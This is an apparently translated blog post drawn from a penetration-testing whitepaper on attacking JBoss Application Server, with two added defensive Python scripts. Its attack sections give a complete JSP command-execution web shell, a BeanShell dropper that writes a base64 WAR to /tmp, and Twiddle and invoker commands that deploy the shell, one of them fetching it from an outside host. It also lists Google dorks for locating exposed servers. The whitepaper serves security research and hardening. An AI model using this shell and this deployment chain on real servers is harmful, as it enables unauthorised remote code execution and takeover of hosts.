Sleepy Dragon · 2013/07/23 19:28

0x00 Introduction


JBoss Application Server (JBoss AS) is a widely used open source Java application server.

It is part of the JBoss Enterprise middleware (JEMS) and is often used in large enterprises.

Because the software is highly modular and loosely coupled, it is very complex, which also makes it an easy target for attackers.

This article points out the potential risks of the JBoss application server from an attacker’s point of view, along with examples of how to execute arbitrary code on the JBoss application server.

0x01 JBoss overview

The JBoss application server is based on Java Enterprise Edition 1.4 and runs on a wide range of operating systems, including Linux, FreeBSD and Windows, as long as a Java Virtual Machine is installed.

JBoss application server architecture

Java Management Extensions (JMX)

Java Management Extensions (JMX) is a standardized architecture for monitoring and managing Java applications. JMX has three layers:

The JMX architecture

Instrumentation Level: mainly defines the information model. In JMX, the various managed objects exist as administrative artifacts that are registered with the MBean server when they need to be managed. This layer also defines the notification mechanism and some auxiliary metadata classes.

Agent Level: Mainly defines various services and communication models. At the heart of this layer is an MBean server with which all administrative artifacts need to be registered to be managed. Management artifacts registered with the MBean server do not communicate directly with remote applications; they communicate through protocol adapters and connectors. Protocol adapters and connectors also register with the MBean server as administrative artifacts to provide the corresponding services.

Distributed Service Level: Mainly defines the management interfaces and artifacts that operate on the agent layer so that the administrator can operate the agent. However, the current JMX specification does not provide a specific specification for this layer.

JMX Invoker

Invokers allow client applications to send JMX requests to the server over any protocol.

These calls are all routed through the MBean server to the corresponding MBean service.

The transport mechanism is transparent and can use any protocol, such as HTTP, SOAP or JRMP.

Deployer architecture

Attackers are particularly interested in the Deployers module in the JBoss application server.

They are used to deploy different components.

The main components to be installed in this article:

JAR (Java ARchives): The JAR file format is based on the popular ZIP file format. Unlike ZIP files, JAR files are not only used for compression and distribution, but also for deploying and encapsulating libraries, components and plug-ins, and can be consumed directly by tools such as compilers and JVMs. Special files inside the JAR, such as manifests and deployment descriptors, tell tools how to process a particular JAR.

WAR (Web ARchives): A WAR file is a JAR file that contains the components of a Web application, such as Java ServerPages (JSP), Java classes, static Web pages, and so on.

BSH (BeanSHell scripts) : BeanSHell is a Java scripting language. BeanSHell scripts use Java syntax and run on JRE.

The most important JBoss application server deployer is MainDeployer. It is the main entry point for deploying components.

The component to deploy is passed to MainDeployer as a URL:

org.jboss.deployment.MainDeployer.deploy(String urlspec)

MainDeployer downloads the object and decides which SubDeployer to forward it to.

Depending on the type of component, a SubDeployer (e.g. JarDeployer, SarDeployer, etc.) accepts the object for installation.

To simplify deployment, URLDeploymentScanner can be used; it also takes a URL as a parameter:

org.jboss.deployment.scanner.URLDeploymentScanner.addURL(String urlspec)

The given URLs are periodically checked for new or changed components.

This is how the JBoss application server implements hot deployment, where new or changed components are automatically deployed.

0x02 Attack


The WAR file

The easiest way to run your own code on a JBoss application server is to deploy a component, which JBoss can install via HTTP.

The WAR file must contain a web.xml file in the WEB-INF directory, alongside the actual application code.

This descriptor describes which URLs the application will serve.

The WAR file can be created with the JDK's jar command:

$ jar cvf redteam.war WEB-INF redteam.jsp

Structure of redteam.war:

|-- META-INF
|   `-- MANIFEST.MF
|-- WEB-INF
|   `-- web.xml
`-- redteam.jsp

META-INF/MANIFEST.MF is created automatically by the jar tool and contains information about the JAR, such as the main entry point of the application (the class to invoke) or which additional classes are required. The generated file contains nothing special, just some basic information:

Manifest-Version: 1.0
Created-By: 1.6.0_10 (Sun Microsystems Inc.)

The WEB-INF/web.xml file must be created manually. It contains information about the Web application, such as its JSP files, or more detailed descriptive information such as which icon to display, the name of the error page to show if an error occurs, etc.

<?xml version="1.0"?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
         version="2.4">
  <servlet>
    <servlet-name>RedTeam Shell</servlet-name>
    <jsp-file>/redteam.jsp</jsp-file>
  </servlet>
</web-app>

Content of redteam.jsp:

<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
    String cmd = request.getParameter("cmd");
    Process p = Runtime.getRuntime().exec(cmd);
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while (disr != null) {
        out.println(disr);
        disr = dis.readLine();
    }
}
%>

The HTTP request:

/redteam.jsp?cmd=ls

lists all files in the current directory; the result is returned by the following loop:

while (disr != null) {
    out.println(disr);
    disr = dis.readLine();
}

JMX Console

The JMX console is a component that allows direct interaction with the JBoss application server through a Web browser.

It makes it easy to manage JBoss servers, and MBean properties and methods can be called directly, as long as there are no complex parameter types in the parameters.

JMX Console default interface

This is usually the attacker’s first target.

Server and ServerInfo MBeans

The MBeans
jboss.system:type=Server
jboss.system:type=ServerInfo

display information about the JBoss application server and the host system, including the type and version of the Java Virtual Machine and of the operating system.

Attributes of the MBean

The JMX console exposes MBeans for reading and invocation, and contains not only information about the JBoss application server itself but also about the host, which helps with further attacks.

The shutdown() method of the Server MBean shuts down the JBoss application server, so an unauthenticated JMX interface also allows denial-of-service attacks.

Installing redteam.war

In the JMX console, the methods of the MainDeployer MBean can be invoked under the jboss.system domain.

The deploy() method can be called with a single parameter in a URL pointing to the WAR file that the server can access.

When the Invoke button is clicked, the JBoss application server downloads the WAR file and installs it, after which shell commands can be executed.

The deploy() method

The JBoss application executes the ls -l command

RMI: Remote Method Invocation

The usual way to protect the JMX console is to add password protection.

However, this is not the only way to access JBoss application server components. JBoss application servers often interact with client programming interfaces, and Java Remote Method Invocation (RMI) plays an important role here.
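As an added example (not from the whitepaper or the JBoss project), the following Python script checks whether a jmx-console WEB-INF/web.xml actually enforces that password protection; the two web.xml documents are constructed samples modelled on the security-constraint JBoss 4.x ships commented out, and the findings it reports are this script's own wording.

```python
# Added example, not code from the whitepaper or from JBoss: checks whether a
# jmx-console WEB-INF/web.xml enforces the password protection the text
# mentions. Both documents below are constructed samples, modelled on the
# Servlet 2.4 security-constraint that JBoss 4.x ships commented out.
import xml.etree.ElementTree as ET

WEAK_WEB_XML = """<?xml version="1.0"?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee" version="2.4">
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>HtmlAdaptor</web-resource-name>
      <url-pattern>/*</url-pattern>
      <http-method>GET</http-method>
      <http-method>POST</http-method>
    </web-resource-collection>
    <auth-constraint><role-name>JBossAdmin</role-name></auth-constraint>
  </security-constraint>
  <login-config><auth-method>BASIC</auth-method></login-config>
</web-app>"""

# Same document with the http-method list removed: the constraint then
# applies to every verb instead of only GET and POST.
FIXED_WEB_XML = "\n".join(l for l in WEAK_WEB_XML.splitlines()
                          if "<http-method>" not in l)

def audit_web_xml(xml_text):
    """Return a list of findings; an empty list means the console is protected."""
    root = ET.fromstring(xml_text)
    for el in root.iter():  # drop {namespace} prefixes so DTD and XSD web.xml both work
        el.tag = el.tag.rsplit("}", 1)[-1]
    findings = []
    constraints = root.findall("security-constraint")
    if not constraints:
        return ["no security-constraint: console reachable without login"]
    for sc in constraints:
        wrc = sc.find("web-resource-collection")
        if wrc is None:
            findings.append("security-constraint without web-resource-collection")
            continue
        patterns = [p.text.strip() for p in wrc.findall("url-pattern")]
        methods = [m.text.strip() for m in wrc.findall("http-method")]
        if "/*" not in patterns:
            findings.append("url-pattern %s does not cover the whole console" % patterns)
        if methods:
            # Listing verbs constrains only those verbs; any other verb reaches
            # HtmlAdaptor without login. Omit http-method so every verb is covered.
            findings.append("only %s constrained; other HTTP verbs bypass login" % methods)
        if not sc.findall("auth-constraint/role-name"):
            findings.append("auth-constraint has no role-name: no login required")
    if root.find("login-config") is None:
        findings.append("no login-config: container never asks for credentials")
    return findings
```

The same check applies unchanged to the web-console and invoker web applications discussed later, since they use the same descriptor format.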

With RMI, local applications can access remote objects and call their methods. Communication between the client and server is transparent.

The Java Naming and Directory Interface (JNDI) is an application programming interface (API) that gives developers a universal, unified interface for looking up and accessing various naming and directory services; like JDBC, it is built on an abstraction layer.

Existing directories and services accessible through JNDI include:

DNS, XNam, Novell Directory Service, Lightweight Directory Access Protocol (LDAP), CORBA Object Service, the file system, the Windows XP/2000/NT/Me/9x registry, RMI, DSML v1 and v2, and NIS.

Accessing MBeans through RMI

The RMI interface listens on port 4444 by default, and the JNDI interface on ports 1098 and 1099.

To talk to the JBoss application server over RMI, a purpose-written Java program can be used. An easier way is Twiddle, which is included in the JBoss application server installation.

$ sh jboss-4.2.3.GA/bin/twiddle.sh -h
A JMX client to 'twiddle' with a remote JBoss server.

usage: twiddle.sh [options] <command> [command_arguments]

options:
    -h, --help                    Show this help message
        --help-commands           Show a list of commands
    -H=<command>                  Show command specific help
    -c=command.properties         Specify the command.properties file to use
    -D<name>[=<value>]            Set a system property
    --                            Stop processing options
    -s, --server=<url>            The JNDI URL of the remote server
    -a, --adapter=<name>          The JNDI name of the RMI adapter to use
    -u, --user=<name>             Specify the username for authentication
    -p, --password=<name>         Specify the password for authentication
    -q, --quiet                   Be somewhat more quiet

With Twiddle, the JBoss application server's MBeans can be called from the command line via RMI. It is started with twiddle.bat on Windows and twiddle.sh on Linux. As in the JMX console, MBean attributes can be read and modified and MBean methods can be invoked.

Displaying the attributes of the ServerInfo MBean:

$ ./twiddle.sh -s scribus get jboss.system:type=ServerInfo
ActiveThreadCount=50
AvailableProcessors=1
OSArch=amd64
MaxMemory=518979584
HostAddress=127.0.1.1
JavaVersion=1.6.0_06
OSVersion=2.6.24-19-server
JavaVendor=Sun Microsystems Inc.
TotalMemory=129957888
ActiveThreadGroupCount=7
OSName=Linux
FreeMemory=72958384
HostName=scribus
JavaVMVersion=10.0-b22
JavaVMVendor=Sun Microsystems Inc.
JavaVMName=Java HotSpot(TM) 64-Bit Server VM

Installing redteam.war

The WAR file is installed with the deploy() method, using Twiddle:

$ ./twiddle.sh -s scribus invoke jboss.system:service=MainDeployer deploy http://www.redteam-pentesting.de/redteam.war

The shell is then reachable at the following URL:

http://scribus:8080/redteam/redteam-shell.jsp

BSHDeployer

The RMI attack above requires that the JBoss application server can reach the attacker's HTTP server.

However, in many configurations the firewall does not allow the JBoss server to open outbound connections.

To install redteam.war on such a JBoss server, the file must therefore be stored locally on the server.

While JBoss does not allow direct file uploads, the BeanShell deployer (BSHDeployer) can be used to create arbitrary files on the remote server.

BeanShell

BeanShell is a scripting language that runs on the JRE and supports regular Java syntax. It can be written quickly and no compilation is required.

BSHDeployer

BSHDeployer in JBoss server can deploy BeanShell scripts which are automatically executed after installation.

The BSHDeployer method used for installation is:

createScriptDeployment(String bshScript, String scriptName)

BeanShell script

You can use the following BeanShell script to put redteam.war on the JBoss server.

import java.io.FileOutputStream;
import sun.misc.BASE64Decoder;

// Base64 encoded redteam.war
String val = "UEsDBBQACA[...]AAAAA";

BASE64Decoder decoder = new BASE64Decoder();
byte[] byteval = decoder.decodeBuffer(val);
FileOutputStream fs = new FileOutputStream("/tmp/redteam.war");
fs.write(byteval);
fs.close();

val holds the base64-encoded content of the redteam.war file; the script writes it to /tmp/redteam.war.

Installing the redteam.war file

With Twiddle, BSHDeployer's createScriptDeployment() method can be called:

$ ./twiddle.sh -s scribus invoke jboss.deployer:service=BSHDeployer createScriptDeployment "`cat redteam.bsh`" redteam.bsh

redteam.bsh contains the BeanShell script above; on success, the JBoss server returns the location of the temporary file created for the script:

file:/tmp/redteam.bsh55918.bsh

Deploying the BeanShell script creates /tmp/redteam.war, which can now be deployed from the local file:

$ ./twiddle.sh -s scribus invoke jboss.system:service=MainDeployer deploy file:/tmp/redteam.war

You can then access redteam-shell.jsp to execute the command.

Web Console Invoker

Controlling the JBoss server through the JMX console and RMI is the most common method.

There are also more subtle interfaces, one of which is the use of JMXInvoker in the Web console.

Web console

The Web console is similar to the JMX console and can also be accessed through a browser.

The default interface for the Web console:

If the JMX console is password protected, you cannot access the MBean functions through the Web console; you need to log in to access them.

Web console JMX Invoker

Besides displaying the management interface and JBoss server information, the Web console can also monitor MBean attributes in real time.

It is reachable under the URL:

http://$hostname/web-console/Invoker

This Invoker is essentially a JMX Invoker, not limited to the functionality provided by the Web console.

By default, access is unrestricted, so an attacker can use it to send arbitrary JMX commands to the JBoss server.

Installing redteam.war

The redteam.war file can also be installed through the Web console Invoker.

The webconsole_invoker.rb script calls the Web console's JMX Invoker directly, using the Java class org.jboss.console.remote.Util.

Util.class is part of the JBoss server JAR console-mgr-classes.jar and provides the methods:

public static Object invoke(
    java.net.URL externalURL,
    RemoteMBeanInvocation mi)
public static Object getAttribute(
    java.net.URL externalURL,
    RemoteMBeanAttributeInvocation mi)

Through the Web console Invoker, MBean attributes can be read and MBean methods invoked.

The class is used by the webconsole_invoker.rb script as follows:

$ ./webconsole_invoker.rb -h
Usage: ./webconsole_invoker.rb [options] MBean
    -u, --url URL                    The Invoker URL to use
                                     (default: http://localhost:8080/web-console/Invoker)
    -a, --get-attr ATTR              Read an attribute of an MBean
    -i, --invoke METHOD              invoke an MBean method
    -p, --invoke-params PARAMS       MBean method params
    -s, --invoke-sigs SIGS           MBean method signature
    -t, --test                       Test the script with the ServerInfo MBean
    -h, --help                       Show this help

Example usage:
./webconsole_invoker.rb -a OSVersion jboss.system:type=ServerInfo
./webconsole_invoker.rb -i listThreadDump jboss.system:type=ServerInfo
./webconsole_invoker.rb -i listMemoryPools -p true -s boolean jboss.system:type=ServerInfo

As before, BSHDeployer is used to place the redteam.war file on the server:

$ ./webconsole_invoker.rb -u http://scribus:8080/web-console/Invoker -i createScriptDeployment -s "java.lang.String","java.lang.String" -p "`cat redteam.bsh`",redteam.bsh jboss.deployer:service=BSHDeployer

This creates /tmp/redteam.war on the remote server; a second call then installs it with MainDeployer:

$ ./webconsole_invoker.rb -u http://scribus:8080/web-console/Invoker -i deploy -s "java.lang.String" -p "file:/tmp/redteam.war" jboss.system:service=MainDeployer

redteam-shell.jsp is then accessible again.

JMXInvokerServlet

As mentioned earlier, the JBoss server allows any protocol to access the MBean server, and for HTTP, JBoss provides HttpAdaptor.

By default, HttpAdaptor is not enabled, but HttpAdaptor’s JMX Invoker can be accessed directly through the URL.

http://$hostname/invoker/JMXInvokerServlet 
Copy the code

This interface accepts HTTP POST requests and forwards them to MBeans, so similar to the Web console Invoker, JMXInvokerServlet can also send arbitrary JMX calls to the JBoss server.

Creating the MarshalledInvocation object

The invocation format of JMXInvokerServlet is incompatible with the Web console Invoker, so it cannot be driven with the webconsole_invoker.rb script.

MarshalledInvocation objects are normally only used for JBoss-internal communication.

The httpinvoker.rb script works like webconsole_invoker.rb, but requires HttpAdaptor to be enabled on the JBoss server.

$ ./httpinvoker.rb -h
Usage: ./httpinvoker.rb [options] MBean
    -j, --jndi URL                   The JNDI URL to use
                                     (default: http://localhost:8080/invoker/JNDIFactory)
    -p, --adaptor URL                The Adaptor URL to use
                                     (default: jmx/invoker/HttpAdaptor)
    -a, --get-attr ATTR              Read an attribute of an MBean
    -i, --invoke METHOD              invoke an MBean method
        --invoke-params PARAMS       MBean method params
    -s, --invoke-sigs SIGS           MBean method signature
    -t, --test                       Test the script with the ServerInfo MBean
    -h, --help                       Show this help

Installing redteam.war

The installation proceeds in the same way as with webconsole_invoker.rb.
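The following detector is an added example, not part of the whitepaper or its scripts: it flags requests to the HTTP management paths discussed in this article (the JMX console HtmlAdaptor, /web-console/Invoker and /invoker/JMXInvokerServlet) and cmd= requests to JSP files, run over constructed access-log lines in the common log format; 401 responses are treated as evidence that the container enforced a login, and the client addresses, timestamps and sizes are made up.

```python
# Added example, not part of the whitepaper: a small detector for the JBoss
# HTTP management paths discussed above, run over constructed access-log
# lines in Apache/Tomcat "common" format. Paths and MBean names come from
# the text; client addresses, timestamps and sizes are made up.
import re

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')

# Servlets through which arbitrary JMX invocations reach the MBean server
INVOKER_PATHS = ("/web-console/Invoker", "/invoker/JMXInvokerServlet")
DEPLOYERS = ("MainDeployer", "BSHDeployer")

SAMPLE_LOG = """\
10.0.0.5 - - [23/Jul/2013:19:28:01 +0200] "GET /jmx-console/HtmlAdaptor HTTP/1.1" 200 1522
10.0.0.5 - - [23/Jul/2013:19:28:03 +0200] "POST /jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service=MainDeployer HTTP/1.1" 200 611
10.0.0.5 - - [23/Jul/2013:19:28:05 +0200] "POST /web-console/Invoker HTTP/1.1" 200 310
10.0.0.5 - - [23/Jul/2013:19:28:09 +0200] "POST /invoker/JMXInvokerServlet HTTP/1.1" 200 298
10.0.0.9 - - [23/Jul/2013:19:28:12 +0200] "GET /redteam/redteam-shell.jsp?cmd=ls HTTP/1.1" 200 840
10.0.0.7 - - [23/Jul/2013:19:29:00 +0200] "POST /invoker/JMXInvokerServlet HTTP/1.1" 401 0
192.168.1.20 - - [23/Jul/2013:19:30:00 +0200] "GET /index.html HTTP/1.1" 200 2048
"""

def classify(line):
    """Return (severity, reason) for one log line, or None if it is benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, _ts, method, url, status = m.groups()
    path, _, query = url.partition("?")
    if status == "401":
        return None  # the container refused the request: login is enforced
    if path.startswith("/jmx-console/"):
        if any(d in query for d in DEPLOYERS):
            return ("high", "deployer MBean reached via JMX console from %s" % client)
        return ("medium", "JMX console served without login to %s" % client)
    if path in INVOKER_PATHS and method == "POST":
        return ("high", "JMX invocation via %s from %s" % (path, client))
    if path.endswith(".jsp") and re.search(r"(^|&)cmd=", query):
        return ("high", "JSP called with cmd= parameter (possible shell) from %s" % client)
    return None

def scan(log_text):
    """Map each flagged line number to its (severity, reason)."""
    hits = {}
    for n, line in enumerate(log_text.splitlines(), 1):
        verdict = classify(line)
        if verdict:
            hits[n] = verdict
    return hits

if __name__ == "__main__":
    for n, (sev, why) in sorted(scan(SAMPLE_LOG).items()):
        print("line %d [%s] %s" % (n, sev, why))
```

Requests to these paths from any address other than an administrator's workstation deserve a closer look even when the JMX console itself is password protected, since the invoker servlets are separate web applications with their own access rules.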

Search queries that locate JBoss servers:

inurl:"jmx-console/HtmlAdaptor"
intitle:"Welcome to JBoss"

From: Whitepaper_Whos-the-JBoss-now_RedTeam-Pentesting_EN